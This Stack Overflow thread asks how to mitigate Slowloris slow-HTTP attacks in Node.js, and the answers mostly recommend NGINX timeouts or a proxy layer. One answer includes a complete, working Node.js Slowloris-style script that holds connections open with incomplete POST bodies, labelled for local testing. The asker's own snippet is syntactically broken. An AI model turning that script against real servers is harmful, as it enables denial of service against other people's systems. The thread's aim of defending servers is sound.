# How to mitigate Slowloris in Node.js?

Tags: javascript, c, node.js, security, ddos

**Update**

_ https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/ _.

**Update Friday, 13th 2018:**

I managed to convince the Node.js core team about setting a CVE for that.

The fix — new defaults and probably new API — will be there in 1 or 2 weeks.

---

Mitigate means to quiet an attack.

Everybody knows Slowloris:

`HTTP Header` or `POST Data` characters get transmitted slowly to block the `socket`.

Scaled that makes a much easier DoS attack.

**In NGINX the mitigation is inbuilt:**
> Closing Slow Connections
 
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
 
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/

Since there is no inbuilt way to work on the `header` in the `HTTP Server` in `Node.js`.

I came to the question, if I can combine `net` and a `HTTP Server` for mitigating `Slowloris` .

The idea to `destroy` the `connection` in case of `Slowloris` is this.

```
http.createServer(function(req, res) {
    var timeout;    
    net.on('data', function(chunk) {
        clearTimeout(timeout);
        timeout = setTimeout(function() {
            req.connection.destroy();
        }, 100);
    };   
};
```

The problem I can see is, both services have to listen on the same `Socket` on `Port 80 and 443`.

Do — not — know how to tackle this.

It is possible to transfer requests and responses from `net` to `HTTP-Server` and back.

But this takes 2 `sockets` for 1 incoming message.

And 2 `sockets` for 1 outgoing message.

So this is — not — feasible in sense of high available server.

I have no clue.

What can the world do to get rid of this scourge?

[CVE for Apache Tomcat.](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5568)

This is a serious security threat.

I think this want to be solved on `C` or `C++` base.

I cannot write these real programmer languages.

But all of us are helped, if somebody pushes this on Github.

Because the community there once deleted my thread about mitigating Slowloris.

Comment: first, not everybody knows `slowloris`. second, are you wanting to protect from a ddos attack or create one? im assuming defend? third, have you tried anything yourself? could you add whatever code you have tried?

Comment: I wonder why there is no ready to go solution for this. I only have the idea I wrote. There is an old CVE for this.

Comment: my point is, have you tried anything yet or are you wanting someone to do it for you? because this isnt a do-it-for-you service, if you have an issue with any code then you should post it and somebody can help you, else this is off topic as youre asking (in effect) for external resources

Comment: I am trying to help you to write your question correctly, if you dont have a coding issue/error to do with adding slowloris into nodejs, then its off topic as you're asking for external resources which links slowloris with nodejs

Comment: Let us [continue this discussion in chat](https://chat.stackoverflow.com/rooms/167612/discussion-between-mast3rd3mon-and-ajax).

Comment: Dear @mast3rd3mon, how is the wording now? Love, AjAX.

Comment: [stack-overflow-isnt-very-welcoming-its-time-for-that-to-change.](https://stackoverflow.blog/2018/04/26/stack-overflow-isnt-very-welcoming-its-time-for-that-to-change/?cb=1) @mast3rd3mon

Comment: what relevance does that have?

Answer (score 5):

I think you're taking a wrong approach for this vulnerability.

This doesn't deal with `DDOS attack` (Distributed Denial of Service) where many IPs are used, and when you need to continue serving some machines that are inside the same firewall as machines involved in the attack.

Often machines used in DDOS aren't real machines that have been taken over (maybe vitualized or with software to do it from different IPs).

When a DDOS against a large target starts, per-IP throttling may ban all machines from the same fire-walled LAN.

To continue providing service in the face of a DDOS, you really need to block requests based on common elements of the request itself, not just IP. security.se may be the best forum for specific advice on how to do that.

Unfortunately, DOS attacks, unlike XSRF, don't need to originate from real browsers so any headers that don't contain closely-held and unguessable nonces can be spoofed.

**The recommendation: To prevent this issue, you had to have a good firewall policies against DDos attacks and massive denial services.**

BUT! If you want to do something to test a Denial service with node.js, you can use this code (use only for test purposes, not for a production environment)

```
var net = require('net');

var maxConnections  = 30;
var connections     = [];

var host    = "127.0.0.1";
var port    = 80;

function Connection(h, p)
{
    this.state  = 'active';
    this.t      = Date.now();

    this.client = net.connect({port:p, host:h}, () => {
        process.stdout.write("Connected, Sending... ");

        this.client.write("POST / HTTP/1.1\r\nHost: "+host+"\r\n" +
            "Content-Type: application/x-www-form-urlenconded\r\n" +
            "Content-Length: 385\r\n\r\nvx=321&d1=fire&l");

        process.stdout.write("Written.\n");
    });
    this.client.on('data', (data) => {
        console.log("\t-Received "+data.length+" bytes...");
        this.client.end();
    });
    this.client.on('end', () => {
        var d = Date.now() - this.t;
        this.state = 'ended';

        console.log("\t-Disconnected (duration: " +
            (d/1000).toFixed(3) +
            " seconds, remaining open: " +
            connections.length +
            ").");
    });
    this.client.on('error', () => {
        this.state = 'error';
    });

    connections.push(this);
}

setInterval(() => {
    var notify = false;

    // Add another connection if we haven't reached
    // our max:
    if(connections.length < maxConnections)
    {
        new Connection(host, port);
        notify = true;
    }

    // Remove dead connections
    connections = connections.filter(function(v) {
        return v.state=='active';
    });

    if(notify)
    {
        console.log("Active connections: " + connections.length +
            " / " + maxConnections);
    }
}, 500);
```

Comment: Hi. Thank you for going into DDoS. DDoS only is being made easier by Slowloris. Can you go into detail how to stop that? I agree that without an upstream-filtering by the hoster one has no chance to stop any DDoS. But detecting a Slowloris attack is impossible. Because all the connections seem legit.

Comment: `node.js` can't help by himself you in particular case, if you receive a `Slowloris` attack, the denial service will be in the previous network layer, your node.js server won't have the capacity to do anything.
The denial service and other attacks happens in the network. @AjAX

Comment: No. Slowloris is an `OSI-Layer 7` attack. `HTTP based`. It is `IP based` though. You might — not — know. But I cannot upvote your answer. Only possible from 15 reputation.

Comment: *`HTTP based` only in the case of a `file-server`. Otherwise it is `OSI-Layer 4`, `TCP`. You are right. But this question is for a `HTTP file-server`.

Comment: If you want more help, I recommend you to re-formulate the question, because, the community can try to help you with right question, we can't assume things and configurations @AjAX.

Comment: Also, I could recommend you this thread: https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate-apache-http-server/ 
It explains some configurations (for `apache`) about how mitigate it, maybe you can try to do a similar configuration running `Nginx` for your `nodejs` server or your `HTTP File server`

Comment: My questions always get down-voted. I cannot explain Slowloris more. Do you have a good source, that links to it, please? And where is the information `HTTPS` missing or better positioned? My thought is, characters are shimmering in front of the eyes of people.

Comment: @AjAX. almost all the documentation is for `Apache`, but I could recommend you the thread:
https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate-apache-http-server/
https://www.slashroot.in/slowloris-http-dosdenial-serviceattack-and-prevention
https://documentation.cpanel.net/display/EA/How+To+Mitigate+Slowloris+Attacks
And if it helps, you can give me an UpVote or mark my answer as correct!

Comment: As I said. I can only up-vote from 15 reputation. Nginx as proxy works. `client_body_timeout` and `client_header_timeout`. But how can state-of-the-art Node.js — not — handle that. Since your answer is — not — about that, I can unfortunately only hope for a better answer. Love.

Comment: Oh! I know! you should try to use `Nginx` over your `Node.js server`.
Now I understand whole the question!!! 
Check this video about how to configure it: https://www.youtube.com/watch?v=FJrs0Ar9asY 
After that read this thread
https://github.com/valyala/goloris
`Nginx` with `Node.js`
If works to you, you can mark the answer as the correct one

Comment: Sorry. You seem to think I want to build a Slowloris attack. I want to mitigate it. You seem knowledgeable in `Node.js`. Can you paint the path of how to take `HTTP` requests in `net`. Pass it to `http.createServer()`. And then pass the response back to the user via `net` I guess; then accepting.

Comment: To mitigate it, use `nginx` over your `node.js`.
For your request, add the line: 
`var fullUrl = req.protocol + '://' + req.get('host') + req.originalUrl;` after the `var timeout; ` declaration.
Also, if you want to printit, you can use: `console.log("THE URL IS: " + req.protocol + '://' + req.get('host') + req.originalUrl );`

Comment: What do you mean. Running a Slowloris attack? No. Do — not — wanna do.

Comment: To mitigate it, use `nginx` over your `node.js` can mitigate it. For your `request`, add the line: `var fullUrl = req.protocol + '://' + req.get('host') + req.originalUrl;` after the `var timeout;` declaration. Also, if you want to print it, you can use: `console.log("THE URL IS: " + req.protocol + '://' + req.get('host') + req.originalUrl );` @AjAX.

Answer (score 5):

The best way to mitigate this issue, as well as a number of other issues, is to **place a proxy layer such as nginx or a firewall between the node.js application and the internet**.

If you're familiar with the paradigms behind many design and programming approached, such as OOP, you will probably recognize the importance behind "**separation of concerns**".

The same paradigm holds true when designing the infrastructure or the way clients can access data.

**The application should have only one concern: handle data operations (CRUD)**. This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc').

**Other concerns should be placed in a separate layer**, such as an nginx proxy layer.

For example, nginx will often be concerned with routing traffic to your application / load balancing. This will include security concerns related to network connections, such as SSL/TLS negotiations, slow clients, etc'.

An extra firewall might (read: should) be implemented to handle additional security concerns.

The solution for your issue is simple, **do not directly expose the node.js application to the internet, use a proxy layer - it exists for a reason**.

Comment: One thing I wonder is. Does NGINX — not — have a lower scalability. Node processes more requests. So this is a bottle-neck, nah? I will wait a bit with accepting. Since I hope to get other fact-people in.

Comment: [nginx is actually faster than node.js](https://iwf1.com/apache-vs-nginx-vs-node-js-and-what-it-means-about-the-performance-of-wordpress-vs-ghost), at least on my machine. It's also [often used to improve horizontal scaling as a load balancer](https://nginx.org/en/docs/http/load_balancing.html) as well as being a proxy. Besides, even if this weren't the case, security is often more important than performance.

Comment: [This guy says, NGINX is a bottleneck.](https://blog.jayway.com/2015/04/13/600k-concurrent-websocket-connections-on-aws-using-node-js/#comment-289551) Blog article written by him.

Comment: @AjAX., with all due respect, it sounds like that person doesn't know what they're doing. nginx can be used to load-balance hundreds of thousands of connections. It's used by huge websites for security reasons as a load balancer and a routing / proxy layer. Wordpress.com runs on nginx... do you think Wordpress.com can't handle more than 100K connections?

Comment: @AjAX. , P.S. You can read [the documentation about nginx clustering](https://www.nginx.com/resources/glossary/clustering/) (btw, it reveals that Netflix uses nginx too, are they limited to 100K users?)... moreover, the 65K connection limit isn't server specific, it's per process per client on every system. [It's a TCP/IP limitation so a single source IP can initiate no more than 65K connections to a target IP](https://superuser.com/questions/251596/is-there-a-hard-limit-of-65536-open-tcp-connections-per-ip-address-on-linux).

Comment: He just says, that when you use 1 NGINX as a proxy. The IP is always the same. That hits the 65k port-limit. Of course one can scale NGINX. But one needs several machines. Everything is possible, — not — everything helps.

Comment: [Listening to a Unix Socket instead of a TCP/IP socket](https://nodejs.org/api/net.html#net_server_listen_path_backlog_callback) (in your node.js app) will both improve performance with nginx and fix the issue. Another common approach uses nginx, and a number of containers running the node.js application (which also provides sandboxing).

Comment: Thanks. Good tip. But `Unix-Sockets` only work on the same machine. I will look into that sandboxing.